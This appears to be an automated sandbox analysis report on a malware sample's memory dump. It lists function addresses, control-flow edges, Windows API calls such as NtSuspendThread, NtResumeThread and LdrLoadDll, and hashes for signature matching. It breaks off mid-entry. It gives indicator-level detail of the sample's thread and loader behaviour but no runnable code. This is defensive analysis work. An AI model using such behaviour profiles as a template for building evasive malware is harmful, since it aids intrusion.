                                                                                              • Opcode Fuzzy Hash: 10f784cb7a7465b49218334df4e70ac1398cacb19b884e6fb5fd4ed04110ac16
                                                                                              • Instruction Fuzzy Hash: CC712E71E04258DFCB05CFA9C490AEDBBF1AF49304F1880AAE855B7341D738AA45DF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 315 40aca3-40acc2 316 40acc8-40ad07 call 40a123 315->316 317 40acc3 call 40a113 315->317 320 40ade5-40adfa NtResumeThread 316->320 321 40ad0d-40ad52 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 316->321 317->316 323 40ae00-40ae07 320->323 324 40ae97-40aea3 320->324 343 40ad5d-40ad63 321->343 326 40ae12-40ae18 323->326 328 40ae40-40ae44 326->328 329 40ae1a-40ae3e 326->329 332 40ae86-40ae94 call 40a1b3 328->332 333 40ae46-40ae4d 328->333 329->326 332->324 334 40ae58-40ae5e 333->334 334->332 337 40ae60-40ae84 334->337 337->334 344 40ad65-40ad89 343->344 345 40ad8b-40ad8f 343->345 344->343 345->320 347 40ad91-40adac 345->347 348 40adb7-40adbd 347->348 348->320 349 40adbf-40ade3 348->349 349->348
                                                                                              APIs
                                                                                              • NtResumeThread.NTDLL(004071D5,?,?,?,?), ref: 0040ADED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: e82c6908598d20ec0be45675678c3b10373641ab3eec8e70e69c302ce30f2250
                                                                                              • Instruction ID: b6f10511c00207d67f0fbc32bcefce55cc479fdc692c5c7557564370438ddd56
                                                                                              • Opcode Fuzzy Hash: e82c6908598d20ec0be45675678c3b10373641ab3eec8e70e69c302ce30f2250
                                                                                              • Instruction Fuzzy Hash: D3715F71E04258DFCB04CFA9C890AEDBBF2BF49304F18806AE859B7341D638A955CF95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 243 40a673-40a6d7 call 40a113 call 40a123 248 40a7b5-40a7ca NtSuspendThread 243->248 249 40a6dd-40a722 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 243->249 251 40a7d0-40a7d7 248->251 252 40a867-40a873 248->252 271 40a72d-40a733 249->271 254 40a7e2-40a7e8 251->254 256 40a810-40a814 254->256 257 40a7ea-40a80e 254->257 260 40a856-40a864 call 40a1b3 256->260 261 40a816-40a81d 256->261 257->254 260->252 264 40a828-40a82e 261->264 264->260 267 40a830-40a854 264->267 267->264 272 40a735-40a759 271->272 273 40a75b-40a75f 271->273 272->271 273->248 274 40a761-40a77c 273->274 276 40a787-40a78d 274->276 276->248 277 40a78f-40a7b3 276->277 277->276
                                                                                              APIs
                                                                                              • NtSuspendThread.NTDLL(?,?), ref: 0040A7BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: SuspendThread
                                                                                              • String ID:
                                                                                              • API String ID: 3178671153-0
                                                                                              • Opcode ID: df1744cd3ab3c9e63664b9d7c7920faaf1bd56dff2a6f15b324ade073ee0abe8
                                                                                              • Instruction ID: e0512f439ae47d9be5cbe886a187579ca4bcb7003b3baa994f3caa2f25e50319
                                                                                              • Opcode Fuzzy Hash: df1744cd3ab3c9e63664b9d7c7920faaf1bd56dff2a6f15b324ade073ee0abe8
                                                                                              • Instruction Fuzzy Hash: 95714F75E04258DFCB04CFA9C490AEDBBF1BF49304F1880AAE859B7341D638A956CF95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00418C15
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID:
                                                                                              • API String ID: 2234796835-0
                                                                                              • Opcode ID: 1ece3eff7ef69611ee126556be6f4899efe61f532828b703a8cdf4cdaaeb4af3
                                                                                              • Instruction ID: 3a7d3c80330e5758b3a9f81f32ca88ff767ca5b188dc6faacfe14b01834f0b54
                                                                                              • Opcode Fuzzy Hash: 1ece3eff7ef69611ee126556be6f4899efe61f532828b703a8cdf4cdaaeb4af3
                                                                                              • Instruction Fuzzy Hash: 470152B5E0010DB7DB10DAE5DD42FDEB7789B54308F0081AAE90897240F635EB588795
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID:
                                                                                              • API String ID: 3535843008-0
                                                                                              • Opcode ID: 798d9c3876bce148b54ee63ea797cdf3a6eb52ae3eb05a8af88ddaea95a2db47
                                                                                              • Instruction ID: d89d2c0c652fac5e8b7a6d34093b53a94ebb12e8b588f04006b5246e933adf9e
                                                                                              • Opcode Fuzzy Hash: 798d9c3876bce148b54ee63ea797cdf3a6eb52ae3eb05a8af88ddaea95a2db47
                                                                                              • Instruction Fuzzy Hash: DBE08C723402187BC620EA5ADC42F9BB7ADDFC5B14F01405AFA08A7281D6B0B9108BF4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(13d6pS3,00000111,00000000,00000000), ref: 0041540A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 'oN$13d6pS3$13d6pS3
                                                                                              • API String ID: 1836367815-4202519509
                                                                                              • Opcode ID: abe8662b7715577a4b67e00549239f0ae9c7219e6112b4b4964fce852ca0655b
                                                                                              • Instruction ID: fe34e254e3c78a2d2e75bf211c42e0671cebaf8842b7d31fa9d3e155b3f4b5cb
                                                                                              • Opcode Fuzzy Hash: abe8662b7715577a4b67e00549239f0ae9c7219e6112b4b4964fce852ca0655b
                                                                                              • Instruction Fuzzy Hash: E4012BB1E0011CBADB11BAE19C81DEFBB7CDF81398F408029FA14B7140E6785F058BA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(13d6pS3,00000111,00000000,00000000), ref: 0041540A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 13d6pS3$13d6pS3
                                                                                              • API String ID: 1836367815-3378015834
                                                                                              • Opcode ID: 2a18f07d3b58b25007c1776e027721ed4c3c70ecef04641e0f5be156848a558b
                                                                                              • Instruction ID: 3a74e114496ce0711f9fc21398a0d08397c93f4088640f40c2c0ae561a51f52a
                                                                                              • Opcode Fuzzy Hash: 2a18f07d3b58b25007c1776e027721ed4c3c70ecef04641e0f5be156848a558b
                                                                                              • Instruction Fuzzy Hash: 45012BB1E0011CBADB01BAE19C81DEF7B7CDF81398F408029FA1477140D6785F058BA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(?,0041F3AB,?,?,00000000,?,0041F3AB,?,?,?), ref: 0042C22E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 1cd7afffb4599489c2e922e741e5df127c6c52b9574b0e89c0ec541112c06f1e
                                                                                              • Instruction ID: d3d283629ae7dbb578c3361da26e2255cf3ead57a8e0f8df25f3f891fe741430
                                                                                              • Opcode Fuzzy Hash: 1cd7afffb4599489c2e922e741e5df127c6c52b9574b0e89c0ec541112c06f1e
                                                                                              • Instruction Fuzzy Hash: 48E09AB1300204BFDA10EE99EC41E9B77ADEFC9710F00001AFD08A7282CA70BD108BB9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FC5D89F8,00000007,00000000,00000004,00000000,004185EF,000000F0,?,?,?,?,?), ref: 0042C27E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3298025750-0
                                                                                              • Opcode ID: 84c9b89b4cdf1f602563f4f89da99040e5f52e99967f744197380856f61d1e48
                                                                                              • Instruction ID: c9dcfcbd2332931f1569d3fe54102bcbb547f49f7c4da694ae441fffeaf01cfd
                                                                                              • Opcode Fuzzy Hash: 84c9b89b4cdf1f602563f4f89da99040e5f52e99967f744197380856f61d1e48
                                                                                              • Instruction Fuzzy Hash: 40E092753442047BC610EE5ADC42F9B73ADEFC5710F000419FD08A7241C670B9208BB8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ExitProcess.KERNELBASE(?,00000000,?,?,39D1C69F,?,?,39D1C69F), ref: 0042C2CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExitProcess
                                                                                              • String ID:
                                                                                              • API String ID: 621844428-0
                                                                                              • Opcode ID: 350054d7e724a5522385e81d2f9e3944af108638e355487cb8015eeb31deba3a
                                                                                              • Instruction ID: 632e54142e25fb71edcd38b63f987ef404ae7833aca244d52deb45822a5d22ed
                                                                                              • Opcode Fuzzy Hash: 350054d7e724a5522385e81d2f9e3944af108638e355487cb8015eeb31deba3a
                                                                                              • Instruction Fuzzy Hash: 5CE04F752402147BC520EA5ADC41F9B775DDFC5714F004019FA0867142CAB479158BE5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: [Pj
                                                                                              • API String ID: 0-2289356113
                                                                                              • Opcode ID: 27ae018e16d23a04be0202338ce038b366df44a43126288a574badd82aab0704
                                                                                              • Instruction ID: 82301c17b6ea649db4769ffc93e25afe3e0c224eaa9e840b40d9d5674297b156
                                                                                              • Opcode Fuzzy Hash: 27ae018e16d23a04be0202338ce038b366df44a43126288a574badd82aab0704
                                                                                              • Instruction Fuzzy Hash: 03F062312043447FDB21AA20CC85F2A7BA9AF85754F549818F8457A093C7669821E721
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                              • Instruction ID: 131fa78438af128fd36248492ca9ca352e69f27065d87bfc86952a91b20433e8
                                                                                              • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                              • Instruction Fuzzy Hash: 27F022203240699BDB09EB588C916FB33D5EF94705F54E03EEF49DB206DA31ED008294
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                              • Instruction ID: dbddd362877c6671cc3641b304bd84ba20b794e95208ef3555b7f793943c1270
                                                                                              • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                              • Instruction Fuzzy Hash: 25F082722422089FCB1CCF04C490BB937B2EB80719F24902CE60B9F692D7359841C654
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: true
                                                                                              • Associated: 00000006.00000002.415689767.0000000000E80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F70000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F80000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F84000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F87000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000F90000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.415689767.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_e80000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                              • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                                                              • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                              • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                              • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                                                              • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                              • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                              • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                                                              • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                              • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                                                              • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                                                              • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                                                              • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
